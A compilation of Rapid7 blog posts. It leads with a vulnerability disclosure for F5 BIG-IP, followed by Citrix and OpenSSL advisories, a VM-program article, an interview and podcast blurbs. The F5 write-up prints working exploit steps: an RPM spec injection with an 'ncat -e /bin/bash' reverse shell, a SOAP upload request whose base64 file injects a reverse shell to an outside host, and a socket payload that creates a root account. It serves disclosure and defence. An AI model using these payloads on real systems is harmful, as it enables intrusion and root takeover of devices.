CVE-2022-41622 and CVE-2022-41800 (FIXED): F5 BIG-IP and iControl REST Vulnerabilities and Exposures

Rapid7 discovered several vulnerabilities and exposures in F5 BIG-IP and BIG-IQ devices running a customized distribution of CentOS detailed in F5’s Base Operating Systems support article. The affected products are detailed in the vendor advisories below:

  • CVE-2022-41622: BIG-IP and BIG-IQ are vulnerable to unauthenticated remote code execution via cross-site request forgery (CSRF)
  • CVE-2022-41800: Appliance mode iControl REST is vulnerable to authenticated remote code execution via RPM spec injection

Rapid7 also discovered several bypasses of security controls that F5 does not consider vulnerabilities with a reasonable attack surface (K05403841):

  • ID1145045 – Local privilege escalation via bad UNIX socket permissions (CWE-269)
  • ID1144093 – SELinux bypass via incorrect file context (CWE-732)
  • ID1144057 – SELinux bypass via command injection in an update script (CWE-78)

Note: the presence of SELinux hardening on F5 devices is an excellent safeguard that made our exploitation attempts more difficult.

Rapid7 initially reported these vulnerabilities to F5 on August 18, 2022. Since then, members of our research team have worked with the vendor to discuss impact, resolution, and a coordinated response.

Product description

Several F5 products, namely in the BIG-IP family of traffic-shaping devices, are affected by the vulnerabilities. These devices and applications are typically exposed to the internet for normal functionality, but the management ports where these vulnerabilities occur are typically internal-facing.

For more information on the affected products, see the vendor’s advisory, and the vendor’s product website.


We believe that widespread exploitation of the issues in this disclosure is unlikely. That being said, by successfully exploiting the worst of the vulnerabilities (CVE-2022-41622), an attacker could gain persistent root access to the device’s management interface (even if the management interface is not internet-facing). However, that would require a confluence of factors to actually be exploitable (an administrator with an active session would need to visit a hostile website, and an attacker would have to have some knowledge of the target network).

Most of the remaining vulnerabilities are relatively minor, and require the attacker to already have some level of access to the target device. They are more likely to be leveraged as part of an exploit chain to exacerbate more serious vulnerabilities.

At time of publishing, F5 was not aware of any exploitation of these vulnerabilities.


These vulnerabilities were discovered and documented by Ron Bowes, Lead Security Researcher at Rapid7. They are being disclosed in accordance with Rapid7’s vulnerability disclosure policy.

Vendor statement

F5 is committed to security, and we collaborate with valued researchers, such as Rapid7, to respond to and resolve vulnerabilities on behalf of our customers.


CVE-2022-41622 – Unauthenticated Remote Code Execution in SOAP API via CSRF

F5 Big-IP’s SOAP API (the endpoint /iControl/iControlPortal.cgi) does not have cross-site request forgery (CSRF) protection, nor does it require a correct Content-Type or other typical SOAP API protections. Consequently, if a user (who is authenticated to an F5 Big-IP device) visits an attacker-controlled website (or is redirected there via an open redirect or cross-site scripting), an attacker can run arbitrary SOAP commands against the F5 Big-IP SOAP API in the authenticated user’s session. That could lead to remote code execution in several different ways, which we demonstrated in a proof of concept.

Note: several of the exploit paths require SELinux bypasses, which we have detailed below.

The API endpoint for SOAP requests, iControlPortal.cgi, which is accessible at /iControl/iControlPortal.cgi, is a CGI script that is SetUID root — that is, it executes as root:

ls -l /usr/local/www/iControl/iControlPortal.cgi
-rwsr-xr-x. 1 root root 2931172 Jul 15 01:13 /usr/local/www/iControl/iControlPortal.cgi

The script authenticates the user via HTTP Basic authentication and accepts XML SOAP requests. The XML API is quite complex with many different API endpoints available to use. We chose the upload_file and create_user_3 endpoints as examples in our PoC, because they demonstrate the impact of the exploit concisely. We didn’t find a way to immediately run code on the target host, but our investigation did not include every possible API endpoint.

The PoC file has full details on the payloads we tested and how to use them to execute arbitrary code at reboot or login.

CVE-2022-41800 – Authenticated Remote Code Execution via RPM Spec Injection

F5 Big-IP’s JSON API includes an administrator-only endpoint that creates an RPM specification file (.rpmspec). That file is consumed by another administrator-only endpoint to create an RPM file. Both endpoints are vulnerable to injection attacks into the RPM spec file, where additional fields could be added to the spec using newlines. Notably, an attacker could add executable shell commands that run when the resultant RPM file is created. This would give authenticated administrators (who may be malicious insiders, users of compromised accounts, etc) the ability to run shell commands using an endpoint that is not designed or documented as having that functionality.

Although F5 considered this noteworthy enough to assign CVE-2022-41800, we consider the risk of this vulnerability to be low. While the results are surprising, this exploit requires an administrator login, and other endpoints (such as /mgmt/tm/util/bash) that are capable of executing shell commands by-design. That said, this technique can bypass blocklists or alerts that an administrator might set up for the well known bash endpoint.

To demonstrate the vulnerability, we developed this JSON payload:

  "specFileData": {
    "name": "test",
    "srcBasePath": "/tmp",
    "version": "test6",
    "release": "test7",
    "description": "test8\n\n%check\nncat -e /bin/bash 4444",
    "summary": "test9"

Note the newlines and %check in the description field, which according to the documentation is typically used to run tests. We sent that JSON as part of an authenticated request to /rpm-spec-creator:

$ curl -sk -uadmin:Password1 -H "Content-Type: application/json" -X POST --data '{"specFileData": {"name": "test", "srcBasePath": "/tmp", "version": "test6", "release": "test7", "description": "test8\n\n%check\nncat -e /bin/bash 4444", "summary": "test9"}}'
{"specFileData":{"name":"test","srcBasePath":"/tmp","version":"test6","release":"test7","description":"test8\n\n%check\nncat -e /bin/bash 4444","summary":"test9","user":"restnoded","group":"restnoded"},"specFilePath":"/var/config/rest/node/tmp/e1816b74-cb67-4c96-b4f0-4be45b0f61a5.spec"}

The server responds with a specFilePath containing the spec we created. Here’s what the file looks like on the file system:

$ ssh [email protected] cat /var/config/rest/node/tmp/e1816b74-cb67-4c96-b4f0-4be45b0f61a5.spec
Summary: test9
Name: test
Version: test6
Release: test7
BuildArch: noarch
Group: Development/Libraries
License: Commercial Packager: 
F5 Networks <[email protected]>


%check -e /bin/bash 4444


We start our listener on the host/port specified in the ncat command:

$ nc -v -l -p 4444
Ncat: Version 7.93 ( )
Ncat: Listening on :::4444
Ncat: Listening on

And build the RPM with /build-package (using jq to format the output):

$ curl -X POST -sku admin:Password1 --data '{"state": {}, "appName": 
"test", "packageDirectory": "/tmp", "specFile
Path": "/var/config/rest/node/tmp/e1816b74-cb67-4c96-b4f0-4be45b0f61a5.spec", "force": true }' | jq

  "step": "RUN_BUILD_RPM_TASK",
  "packageDirectory": "/tmp",
  "appName": "test",
  "specFilePath": "/var/config/rest/node/tmp/e1816b74-cb67-4c96-b4f0-4be45b0f61a5.spec",
  "force": true,
  "rpmDescription": "Default exported iApp description.",
  "rpmSummary": "Default exported iApp summary.",
  "isSpecFileToCleanUp": false,
  "id": "5de02c7f-ac65-4fa0-8c2b-b541967ce578",
  "status": "CREATED",
  "userReference": {
  "link": "https://localhost/mgmt/shared/authz/users/admin"
"identityReferences": [
"link": "https://localhost/mgmt/shared/authz/users/admin"
"ownerMachineId": "97163127-c56e-456c-af33-752dec349873",
"generation": 1,
"lastUpdateMicros": 1666214391730921,
"kind": "shared:iapp:build-package:buildrpmtaskstate",
"selfLink": "https://localhost/mgmt/shared/iapp/build-package/5de02c7f-ac65-4fa0-8c2b-b541967ce578"

Then, we verify that we get a root in shell on our listener:

$ nc -v -l -p 4444
Ncat: Version 7.93 ( )
Ncat: Listening on :::4444
Ncat: Listening on
Ncat: Connection from
Ncat: Connection from


ID1145045 – Local Privilege Escalation via UNIX Socket Permissions

F5 uses a proprietary database called mcp, which is used for persistent storage on Big-IP (and related) devices. The database is owned by root and accessed via a UNIX domain socket with 0777 permissions (accessible by all local users) and no authentication:

# ls -l /var/run/mcp 
srwxrwxrwx. 1 root root 0 Oct 19 14:12 /var/run/mcp

We can connect to it and perform queries using socat, which is (helpfully) installed by default.

As part of our research, we fully documented the protocol, including writing a tool that can parse queries, create arbitrary queries, and remotely eavesdrop on traffic via an authenticated SSH connection. While the list of supported object types is extensive, we targeted the user-management code since our goal was security bypasses.

We developed a script called mcp-privesc.rb, which is also included in that repository. The script creates a root-level account when its output is sent to that socket, as well as a pre-built escalationplz.bin payload that creates a rontest / Password1 account when sent to the socket.

Here’s how we used the tool to create a message. Note: it was gzipped it for size reasons, then base64-encoded so we could copy/paste more easily. Output is truncated for the blog, but the full text is included in the file in the repository:

$ ruby ./mcp-privesc.rb blogtest MyFunPW | gzip | base64 -w0
Attempting to create a crypt-sha512 hash of the password
Writing an `mcp` message to stdout that'll create an account: blogtest / $6$vdznqfyc$q9L[...]1
Send it to the target using: socat -t100 - UNIX-CONNECT:/var/run/mcp < mcpmessage.bin


Then, from a non-root account, we send the message to the socket and verify the account exists:

$ whoami

$ echo -ne 'H4s[...]A==' | base64 -d | gunzip - | socat -t100 - UNIX-CONNECT:/var/run/mcp | gzip | base64 -w0

bash-4.2$ su blogtest

[[email protected]:NO LICENSE:Standalone] config # whoami

F5 claims this is not a vulnerability, because, by design, all users that log in are already root (and it’s true that the overwhelming amount of Big-IP’s attack surface runs as root already). However, several network services—including Apache, Tomcat, and Bind—listen on network ports and link to custom modules written in C/C++. If a vulnerability is discovered in any of those non-root services, a privilege escalation exploit path directly to root removes the small amount of privilege separation that exists.

ID1144093 – SELinux Bypass via Incorrect File Context

After finding an arbitrary file write SOAP endpoint, we found that SELinux limited our ability to actually exploit the issue. Despite the SOAP endpoint (iControlPortal.cgi) being set-UID root, and therefore executing as a privileged process, it could not create or overwrite sensitive files due to being part of a restricted SELinux context. That means that we couldn’t use obvious attack paths like adding a script to /etc/profile.d or replacing /var/ssh/root/authorized_keys.

We did, however, find exactly one file in /etc/profile.d that was writable from the SOAP process due to it being a symbolic link to another location:

# ls -l /etc/profile.d/
lrwxrwxrwx. 1 root root 31 Jul 15 02:48 /etc/profile.d/ -> ../../var/run/config/

# ls -l /var/run/config/ 
-r--r--r--. 1 root root 303 Oct 19 15:40 /var/run/config/

If we replace /var/run/config/ with our own script via the SOAP interface, which we can (despite the file itself not having write permission), it will execute next time a user logs in via SSH and /etc/profile.d scripts execute. We use that file as a target in our SOAP exploit proof of concept:

<soapenv:Envelope xmlns:xsi="" xmlns:xsd="" xmlns:soapenv="" xmlns:con="urn:iControl:System/ConfigSync">
      <con:upload_file soapenv:encodingStyle="">
        <file_name xsi:type="xsd:string">/var/run/config/</file_name>
         <file_context xsi:type="urn:System.ConfigSync.FileTransferContext" xmlns:urn="urn:iControl">
            <!--type: Common.OctetSequence-->
            <chain_type xsi:type="urn:Common.FileChainType">FILE_FIRST_AND_LAST</chain_type>

F5 argues that this is not a vulnerability, because it requires a different vulnerability to exist before it can be leveraged (as we demonstrated with CVE-2022-41622 above). As a result, it was not assigned a CVE. However, Rapid7 considers this a vulnerability because it bypasses a security boundary —namely, SELinux. Without these SELinux bypasses, turning an arbitrary file write into code execution would be difficult, since most files an attacker would typically create or replace to exploit a file-write vulnerability (such as adding a script to /etc/profile.d) are blocked.

ID1144057 – SELinux bypass via Command Injection in Startup Script

The script /bin/f5_update_checker, which is executed at boot, is vulnerable to command injection in its configuration file (/shared/f5_update_action). Several strings in the file are passed directly into shell commands, where arbitrary bash commands can be injected using backticks, semicolons, or any other typical CWE-78 technique.

This one is interesting, because we found it quite early in our research but didn’t recognize its significance until much later. During our initial analysis, f5_update_checker caught our eye because it runs at boot, performs some sort of nebulous update check (ironically, update mechanisms are a common source of security vulnerabilities), and is a 32-bit ELF binary written in C++. Additionally, running strings showed that it uses curl insecurely, with -k:

# strings $(which f5_update_checker)
curl -g -k -m 30 -s -f -o /dev/null 

When f5_update_checker starts, it loads and parses a configuration file called /shared/f5_update_action, which doesn’t exist by default. In fact, as far as we can tell, absolutely nothing else on the entire operating system is aware of /shared/f5_update_action! Out of curiosity, we reverse engineered the file format from the binary, since the process won’t start without a valid (enough) file, and found it’s line-based and looks something like:


The URLs are passed directly into curl with no escaping (not even quotes, in fact), so we can add in arbitrary commands however we like:

http://localhost:1234/success`touch /tmp/testshellinjection`

At the next reboot, f5_update_checker will execute, load the configuration file, pause for two minutes (by design), then execute the command.

At that point, we shelved this as not interesting with the note:

f5_update_checker consumes a file /shared/f5_update_action and grabs a URL from it. That leads to a bunch of problems – shell injection, SSRF, etc. But nothing seems to use any of this, so I guess it’s all a dud

Much later, we found the SOAP bypass discussed above, but lamented that while we could upload a file to anywhere on the filesystem as root, we couldn’t overwrite anything of value due to SELinux policies! After thinking for way too long, we remembered the seemingly innocuous vulnerability that we’d found a month earlier, recalled that it references a non-extant file, and tested it with SOAP. Sure enough, it worked!

Here is an example of a SOAP request that will plant a malicious /shared/f5_update_action file:

<soapenv:Envelope xmlns:xsi="" xmlns:xsd="" xmlns:soapenv="" xmlns:con="urn:iControl:System/ConfigSync">
      <con:upload_file soapenv:encodingStyle="">
        <file_name xsi:type="xsd:string">/shared/f5_update_action</file_name>
         <file_context xsi:type="urn:System.ConfigSync.FileTransferContext" xmlns:urn="urn:iControl">
            <!--type: Common.OctetSequence-->
            <file_data xsi:type="urn:Common.OctetSequence">QUFBCmh0dHBzOi8vbG9jYWxob3N0L3N1Y2Nlc3NgbmNhdCAtZSAvYmluL2Jhc2ggMTAuMC4wLjE3OSA0NDQ0YApodHRwczovL2xvY2FsaG9zdC9lcnJvcgowCjAKMAowCg==</file_data>
            <chain_type xsi:type="urn:Common.FileChainType">FILE_FIRST_AND_LAST</chain_type>

This is an interesting case in which a low-risk vulnerability can actually be meaningfully leveraged, in the right context. Specifically, we found a way to bypass SELinux and create some sneaky persistence.

As with some of the other issues documented here, F5 does not consider this to be a vulnerability and did not assign it a CVE (but do plan to fix it). Rapid7 disagrees with their assessment because SELinux is a security boundary, and bypassing SELinux is a security issue. We’d normally consider this to be a very low-risk vulnerability, but because we used it as part of the exploit chain to turn CVE-2022-41622 into code execution, we believe it is important.


F5 has provided the following remediation advice:

F5 recommends customers review the security advisories published for these issues and evaluate their risk. Engineering hotfixes are available on request for both CVEs, and fixes for all of the issues will be included in future releases.

The known exploitation methods for CVE-2022-41622 require the attacker to know the address for a particular BIG-IP and successfully enact a Cross-Site Request Forgery against an administrator who is using the same browser to browse the web as well as manage their BIG-IP. Normal anti-CSRF techniques will prevent this exploit from succeeding; see K94221585 for more details.

The known exploitation methods for CVE-2022-41800 require that an attacker be authenticated as a valid user with Resource Admin or greater privileges. Therefore, the impact is limited to those customers running with Appliance Mode enabled; see K12815 for more information on Appliance Mode.


  • July, 2022: Issues identified by Rapid7 researcher Ron Bowes
  • Thu, Aug 18, 2022: Privately disclosed findings to F5 PSIRT per Rapid7’s CVD policy
  • Aug-Sep, 2022: Discussion and clarification about the issues with F5
  • Thu, Sep 8, 2022: Extension on vulnerability disclosure date requested, offered Nov 17, 2022
  • Fri, Sep 30, 2022: CVE-2022-41622 and CVE-2022-41800 reserved by F5
  • Wed, Oct 5, 2022: Disclosure date moved to Wed, Nov 16, 2022
  • Wed, Nov 16, 2022: This public disclosure

Rapid7 customers

InsightVM and Nexpose customers will be able to assess their exposure to CVE-2022-41622 and CVE-2022-41800 with authenticated vulnerability checks for BIG-IP, expected to be available in the November 16, 2022 content release.

CVE-2022-27510: Critical Citrix ADC and Gateway Remote Authentication Bypass Vulnerabilities

Post Syndicated from Rapid7 original

CVE-2022-27510: Critical Citrix ADC and Gateway Remote Authentication Bypass Vulnerabilities

On November 8, 2022, Citrix published Citrix Gateway and Citrix ADC Security Bulletin for CVE-2022-27510 CVE-2022-27513 and CVE-2022-27516 announcing fixes for three vulnerabilities:

The most notable vulnerability, CVE-2022-27510, is rated a critical 9.8 for “appliances that are operating as a Gateway (SSL VPN, ICA Proxy, CVPN, RDP Proxy),” per Citrix’s advisory, and allows for remote, unauthenticated attackers to take control of a vulnerable system.

Rapid7 has repeatedly observed attacker interest in high-value targets such as Citrix; historically, these appliances become exploited very quickly so organizations that are impacted by CVE-2022-27510 should patch right away. CISA has issued a warning about CVE-2022-27510 here.

Affected products

The following supported versions of Citrix ADC and Citrix Gateway on customer-managed appliances are affected by this vulnerability (Citrix-managed cloud services customers do not need to take any action):

  • Citrix ADC and Citrix Gateway 13.1 before 13.1-33.47
  • Citrix ADC and Citrix Gateway 13.0 before 13.0-88.12
  • Citrix ADC and Citrix Gateway 12.1 before
  • Citrix ADC 12.1-FIPS before 12.1-55.289
  • Citrix ADC 12.1-NDcPP before 12.1-55.289

Mitigation guidance

Organizations that are impacted by CVE-2022-27510 should update to one of the versions listed below immediately. Additionally, it is strongly recommended that organizations ensure that gateway devices require multi-factor authentication (MFA) for logins and that all authentication attempts are logged and audited regularly.

  • Citrix ADC and Citrix Gateway 13.1-33.47 and later releases
  • Citrix ADC and Citrix Gateway 13.0-88.12 and later releases of 13.0
  • Citrix ADC and Citrix Gateway 12.1-65.21 and later releases of 12.1
  • Citrix ADC 12.1-FIPS 12.1-55.289 and later releases of 12.1-FIPS
  • Citrix ADC 12.1-NDcPP 12.1-55.289 and later releases of 12.1-NDcPP

Rapid7 customers

InsightVM and Nexpose customers will be able to assess their exposure to all three CVEs with vulnerability checks expected to be available in the November 15, 2022 content release.

Rapid7’s Impact from OpenSSL Buffer Overflow Vulnerabilities (CVE-2022-3786 & CVE-2022-3602)

Post Syndicated from Rapid7 original

Rapid7’s Impact from OpenSSL Buffer Overflow Vulnerabilities (CVE-2022-3786 & CVE-2022-3602)

As stated in our OpenSSL Buffer Overflow blog post, the CVE-2022-3786 & CVE-2022-3602 vulnerabilities affecting OpenSSL’s 3.0.x versions both rely on a maliciously crafted email address in a certificate. CVE-2022-3786 can overflow an arbitrary number of bytes on the stack with the “.” character (a period), leading to a denial of service, while CVE-2022-3602 allows a crafted email address to overflow exactly four attacker-controlled bytes on the stack. OpenSSL 3.0.7 contains fixes for these vulnerabilities which was released on November 1, 2022.

As part of standard due diligence, Rapid7 evaluates the potential impact of vulnerabilities in its products. This process includes validating the existence of the vulnerable libraries or services, interdependencies, the exploitability of the vulnerability in a given context, and impacts related to applying available patches.

Rapid7’s Insight Agent and Insight Network Sensor were confirmed to be impacted by these vulnerabilities. An Insight Agent fix was released on November 2, 2022 (release version and a Network Sensor fix was released on November 10, 2022 (release version Rapid7’s assessment has found no other impact on our products. Checks for these vulnerabilities have been released within Nexpose and InsightVM.

Rapid7’s Impact from Apache Commons Text Vulnerability (CVE-2022-42889)

Post Syndicated from Rapid7 original

Rapid7’s Impact from Apache Commons Text Vulnerability (CVE-2022-42889)

As stated in our Apache Commons Text blog post, CVE-2022-42889 is a vulnerability in the popular Apache Commons Text library that can result in code execution when processing malicious input, and affects versions 1.5 through 1.9. This vulnerability has been patched as of Commons Text version 1.10.

As part of standard due diligence, Rapid7 evaluates the potential impact of vulnerabilities in its products. This process includes validating the existence of the vulnerable libraries or services, interdependencies, the exploitability of the vulnerability in a given context, and impacts related to applying available patches.

Rapid7’s Nexpose console and InsightVM products are confirmed to currently include commons-text.1.6.jar (as of the date of this post). This library is not directly used within the scan engine, but has a shared dependency within the security console. While Rapid7’s assessment has found no paths to exploit for this vulnerability, we do plan to patch this vulnerability in Nexpose and InsightVM during the month of November 2022.

Common questions when evolving your VM program

Post Syndicated from Rapid7 original

Common questions when evolving your VM program

Authored by Natalie Hurd

Perhaps your organization is in the beginning stages of planning a digital transformation, and it’s time to start considering how the security team will adapt. Or maybe your digital transformation is well underway, and the security team is struggling to keep up with the pace of change. Either way, you’ve likely realized that the approach you’ve used with traditional infrastructure will need to evolve as you think about managing risk in your modern ecosystem. After all, a cloud instance running Kubernetes clusters to support application development is quite different from an on-premise Exchange server!

A recent webinar led by two of Rapid7’s leaders, Peter Scott (VP, Product Marketing) and Cindy Stanton (SVP, Product and Customer Marketing), explored the specific challenges of managing the evolution of risk across traditional and cloud environments. The challenges may be plentiful, but the strategies for success are just as numerous!

Over the course of several years, Rapid7 has helped many customers evolve their security programs in order to keep pace with the evolution of technology, and Peter and Cindy have noticed some themes of what tends to make these organizations successful. They advise working with your team & other stakeholders to find answers to the following questions:

  • What sorts of resources does your organization run in the cloud, and who owns them?
  • What does “good” look like when securing your cloud assets, and how will you measure success?
  • Which standards and frameworks is your company subject to, compliance or otherwise?

Gathering answers to these questions as early as possible will not only aid in the efficacy of your security program, it will also help to establish strong relationships & understanding amongst key stakeholders.

Establishing Ownership

Common questions when evolving your VM program

Proactively identifying teams and individuals that own the assets in your environment will go a long way towards ensuring speed of resolution when risk is present. Peter strongly suggests working with your organization’s Product or Project Development teams to figure out who owns what and get it documented. This way, when you see a misconfiguration, vulnerability or threat that needs to be dealt with, you know exactly who to talk to to get it resolved, saving important time.

The owners that you identify will not only have a hand to play in fixing problems, they can help make the necessary changes to “shift left” and prevent problems in the first place. The sooner you can identify these stakeholders and build relationships with them, the more successful you’ll be in the long run.

Defining “Good” and Tracking Achievement

Common questions when evolving your VM program

Since we’ve established that securing traditional environments is not the same as securing modern environments, we can also agree that the definition of success may not be the same either! After you’ve established ownership, Cindy notes that it’s also important to define what “good” looks like, and how you plan to measure & report on it. Once you’ve created a definition of “good” within your immediate team, it’s also important to socialize that with stakeholders across your organization and track progress towards achieving that state. Tracking & sharing progress is valuable whether your organization meets, exceeds or falls short of your goals; celebrating the wins is just as important as seeking to understand the losses!

Aligning to Standards and Frameworks

Common questions when evolving your VM program

Every industry comes with its own set of compliance and regulatory standards that must be adhered to, and it’s important to understand how security fits in. Your team can use these frameworks as a North Star of sorts when considering how to secure your environment, and the cloud aspects of your environment are no exception. Ben Austin, the moderator of the webinar, provides some perspective on the utility of compliance as a method for demonstrating progress in risk reduction. If your assets are more compliant today than they were 3 months ago, that’s a win for every stakeholder involved. If assets are getting less compliant, then you can work with your already-identified asset owners to make a plan to turn the ship around, and contextualize the importance of remaining compliant with them.

Check out our two previous blogs in the series to learn more about Addressing the Evolving Attack Surface and Adapting your VM Program to Regain Control, and watch the full webinar replay any time!

CVE-2022-3786 and CVE-2022-3602: Two High-Severity Buffer Overflow Vulnerabilities in OpenSSL Fixed

Post Syndicated from Rapid7 original

CVE-2022-3786 and CVE-2022-3602: Two High-Severity Buffer Overflow Vulnerabilities in OpenSSL Fixed

The Rapid7 research team will update this blog post as we learn more details about this vulnerability and its attack surface area. We expect to update this page next by 3 PM EDT on November 1, 2022.

The OpenSSL project released version 3.0.7 on November 1, 2022, to address CVE-2022-3786 and CVE-2022-3602, two high-severity vulnerabilities affecting OpenSSL’s 3.0.x version stream discovered and reported by Polar Bear and Viktor Dukhovni. OpenSSL is a widely used open-source cryptography library that allows for the implementation of secure communications online; this includes generating public/private keys and use of SSL and TLS protocols. (Currently, only the 1.1.1 and 3.0 version streams of OpenSSL are supported). The OpenSSL team warned maintainers and users on October 25 that a critical flaw was on the way — only the second to ever impact the product. Upon release, however, neither vulnerability carried a critical severity rating.

CVE-2022-3786 and CVE-2022-3602 are buffer overflow vulnerabilities in OpenSSL versions below 3.0.7 that both rely on a maliciously crafted email address in a certificate. They differ in two crucial ways: CVE-2022-3786 can overflow an arbitrary number of bytes on the stack with the "." character (a period), leading to denial of service, while CVE-2022-3602 allows a crafted email address to overflow exactly four attacker-controlled bytes on the stack. OpenSSL has a blog available here.

According to the OpenSSL advisory, the vulnerability occurs after certificate verification and requires either a CA to have signed the malicious certificate or for the application to continue certificate verification despite failure to construct a path to a trusted issuer. In other words, exploitability is significantly limited:

  • In the case where a server is the target (a webserver, database server, mail server, etc): The server must first request client authentication as part of a mutual authentication configuration. This is an unusual configuration, and usually specialized to higher-security use cases.
  • In the case where a client is the target (web browser, email reader, database connector, etc): The attacker would need to first coerce a vulnerable client to connect to a malicious server. This could be done through impersonation (MitM on the network, hijacking an existing resource, etc) or by providing an incentive for a person to click a link (through phishing, watering holes, etc).

For both scenarios, these kinds of attacks do not lend themselves well to widespread exploitation.

Once again, these vulnerabilities only affect the OpenSSL 3.0.x version stream, which has not yet been widely adopted. We are not aware of any exploitation in the wild at the time of the vulnerability’s release on November 1, 2022.

Affected products

  • OpenSSL versions 3.0.0 to 3.0.6 (fixed in 3.0.7)

A broad array of popular distributions and technologies use OpenSSL in their offerings, including many widely used Linux distributions. OpenSSL 1.x, which is unaffected, is still the most popular version stream in use. Major distribution maintainers will likely have individual updates out quickly, but we expect a long tail of advisories and trailing fixes as vendors update additional implementations. Community tracking efforts like this one from Royce Williams, or government tracking efforts like this one from NCSC-NL may also be helpful for following individual vendor impact or remediation communications.

Mitigation guidance

Organizations that are running an affected version of OpenSSL should update to 3.0.7 when practical, prioritizing operating system-level updates and public-facing shared services with direct dependencies on OpenSSL. Emergency patching is not indicated.

Rapid7 customers

Our engineering team is in the process of developing both authenticated and unauthenticated vulnerability checks to allow InsightVM and Nexpose customers to assess their exposure to CVE-2022-3786 and CVE-2022-3602. We expect these checks to be available in a content release today (November 1, 2022).

In the meantime, InsightVM customers can use Query Builder with the query software.description CONTAINS OpenSSL 3 to find potentially affected assets. Nexpose and InsightVM customers can create a Dynamic Asset Group with a filtered asset search looking for Software name contains OpenSSL 3.

Additionally, Nexpose and InsightVM customers can use the following SQL query in a SQL Query Export (Security Console -> Reports -> SQL Query Export) to identify whether they have (any version of) OpenSSL in their environments. This query will produce a CSV file with a list of assets containing installed software with “openssl” in its title, and the corresponding version previously found in scans or Insight Agent-based assessments:

SELECT da.sites AS "Site_Name", da.ip_address AS "IP_Address", da.mac_address AS "MAC_Address", da.host_name AS "DNS_Hostname", ds.vendor AS "Vendor", AS "Software_Name", AS "Software_Family", ds.version AS "Software_Version", ds.software_class AS "Software_Class" FROM dim_asset_software das JOIN dim_software ds USING(software_id) JOIN dim_asset da ON da.asset_id = das.asset_id WHERE ds.software_class LIKE '%' AND ILIKE '%openssl%' ORDER BY ASC

The Software_Version column of the CSV can be used to narrow the scope down to OpenSSL 3.x – note that this query may also return packages that are not OpenSSL proper, e.g. libgnutls-openssl27, that have a version number starting with 3 but do not correspond to 3.0.x of OpenSSL per se.

7 Rapid Questions with Toshio Honda, Sr. Security Solutions Engineer

Post Syndicated from Rapid7 original

You have been with Rapid7 for 4 years now, what originally attracted you to work here?

7 Rapid Questions with Toshio Honda, Sr. Security Solutions Engineer

I worked for a cybersecurity company who is a leader for the “Prevention” area prior to joining Rapid7, and I was looking for the next opportunity based on 3 criteria:, “Interesting Products”, “a flexible work environment” and “a supportive and talented team of people”. Rapid7 checked the box for all three of these areas, with a platform of products to help customer’s security operations across areas/categories beyond my experience/expertise, allowing me to stretch and grow my skills. The company is well known for having unique intelligence like Metasploit, as well as being placed #17 in the list of The Cybersecurity 500 by Cybersecurity Ventures. These things attracted me to work here.

What does the team in Japan look like, and what growth have you seen during your time here?

When I joined Rapid7 in January 2018, there were approximately 10+ employees in Japan. These people were primarily made up of Sales and Sales Engineering for products like Nexpose/InsightVM, AppSpider/InsightAppSec, and Metasploit Pro. As the team continues to change and grow, we are now at 20+ employees and hiring in Customer Success and Support so really broadening the skill sets in the region to better support our customers. As we continue to evolve and move towards a solution/platform provider to solve complex customer challenges, and support their security operations with broader products and managed services. Each individual has capabilities and talent as part of the team, which is a huge difference in terms of ‘types’.

What makes the culture at Rapid7 different from other tech and/or cybersecurity companies?

I believe transparency is a major differentiator. The leadership team in Rapid7 listens to each individual, and you have an opportunity to share your ideas and give feedback whether you are brand new or have been in your field for years.

What are the 3 biggest things you have learned during your time at Rapid7?

Here’re the 3 things that came up to my mind:
1. Be Proactive
2. Change is a Constant
3. Ask questions to turn the unknown into known

Being proactive means looking outside your immediate team to identify the right people, and gather the right information. Our team in Japan is relatively small, so it’s essential that we partner with other team members from different departments and locations in order to ensure we are anticipating potential challenges and getting the right people involved upfront.

For #2, almost everything can/will change, from our product roadmaps to the needs of our customer. As we anticipate change and embrace the opportunity to grow, it’s important to maintain customer’s expectations and see how Rapid7 can continue to be a strategic partner in maintaining their security solutions.

For #3, as a Solution Architect, I often have conversations with customers, and sometimes see they don’t even know what they need to improve their security posture. It’s important to unravel what they would need by asking questions to clarify their requirements. The same principle can be applied in case of security incidents. If you don’t have visibility (detections) for an incident, you wouldn’t be able to stop a breach. As a practitioner in Rapid7, I keep those

How would you describe your role at Rapid7?

My main role is Solution Architect (Security Solutions Engineer / Sales Engineer), but I’ve also been given the opportunity to learn new skills that are outside of my typical job description. In addition to my main role, I’ve been able to learn more about customer advisory, technical support and account management, and our professional services. Learning in these different areas has grown my confidence as a technical contributor, and provided me with some new insights into real world customer environments and security operations.

Describe your proudest moment working for Rapid7.

This is a really good question. I can’t pick one as there are so many moments in my memory. However, I am always proudest when I am able to solve especially complex or challenging problems customers are struggling with.

What advice would you give someone thinking about coming to work here?

If you enjoy challenging the status quo and solving interesting challenges, Rapid7 would be a great place to work. The company has a track record and history of supporting employees who have new ideas, so you’ll be supported to think creatively and craft your own vision as to how to support our customers and align to business goals.

If you’re interested in learning about open roles at Rapid7, visit our careers page.

[Security Nation] Jeremi Gosney on the Psychology of Password Hygiene

Post Syndicated from Rapid7 original

[Security Nation] Jeremi Gosney on the Psychology of Password Hygiene

In this episode of Security Nation, Jen and Tod talk to renowned password security expert Jeremi Gosney about how we are all guilty of bad password practices. He discusses the psychology of how we develop the various words/phrase combinations that become our crackable passwords.

Stick around for the Rapid Rundown, where Tod and Jen dive into a great story for Cybersecurity Awareness Month as well as bad data-governance practices.    

Jeremi Gosney

[Security Nation] Jeremi Gosney on the Psychology of Password Hygiene

Jeremi Gosney is a renowned password cracker and password security expert. He is a member of the Hashcat core development team, the former CEO of the password cracking firm Terahash, and the author of the Pufferfish and hmac-bcrypt password hashing functions. He also helps run the DEF CON Password Village and the PasswordsCon track at Security BSides Las Vegas.

Show notes

Interview links

Rapid Rundown links

Like the show? Want to keep Jen and Tod in the podcasting business? Feel free to rate and review with your favorite podcast purveyor, like Apple Podcasts.

Want More Inspiring Stories From the Security Community?

Subscribe to Security Nation Today

[The Lost Bots] S02E05: The real magic in the Magic Quadrant

Post Syndicated from Rapid7 original

[The Lost Bots] S02E05: The real magic in the Magic Quadrant

In this episode, we discuss the best use of market research reports, like Magic Quadrants and Waves. If you’re in the market for a new cybersecurity solution, do you just pick a Leader and call it a day?

“Consult the MQ only after you’ve identified two vendors that would be a perfect security solution for you,” say our hosts Jeffrey Gardner, Detection and Response Practice Advisor and Stephen Davis, Lead D&R Sales Technical Advisor. When you have two that meet or exceed the requirements? “I’ll be honest, I might not care about the MQ placement,” says Davis.

Do not under any circumstances leave before the jazz hands bit: they do gather themselves and talk about how outcomes have to run the show, first and always.

Check back with us in November for our next installment of The Lost Bots!

